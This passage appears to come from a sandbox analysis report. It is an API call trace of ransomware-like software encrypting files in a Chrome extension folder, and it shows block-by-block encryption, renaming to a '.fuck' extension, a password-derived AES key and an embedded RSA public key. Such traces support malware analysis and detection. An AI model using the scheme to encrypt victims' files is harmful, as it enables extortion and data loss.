lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.374] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.374] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.375] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.375] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.375] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.375] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.375] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.375] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.376] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), bFailIfExists=0) returned 1 [0261.382] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js", dwFileAttributes=0x0) returned 1 [0261.382] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg")) returned 1 [0261.384] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.fuck")) returned 1 [0261.385] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.385] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0261.385] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.385] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.385] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.385] GetLastError () returned 0x0 [0261.386] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js")) returned 0x20 [0261.386] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js", dwFileAttributes=0x80) returned 1 [0261.386] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.386] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.387] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.gsg", dwFileAttributes=0x2) returned 1 [0261.388] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.390] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.390] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.390] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.390] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.390] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.390] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.390] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e71948) returned 1 [0261.390] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71948, dwCertEncodingType=0x1, pInfo=0x2eabaf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabb20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabb28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7df80) returned 1 [0261.390] CryptEncrypt (in: hKey=0x2e7df80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.390] CryptEncrypt (in: hKey=0x2e7df80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72470*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e72470*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.390] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e72470*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e72470*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.393] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.405] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.405] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.415] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.416] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.416] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.417] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.417] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, 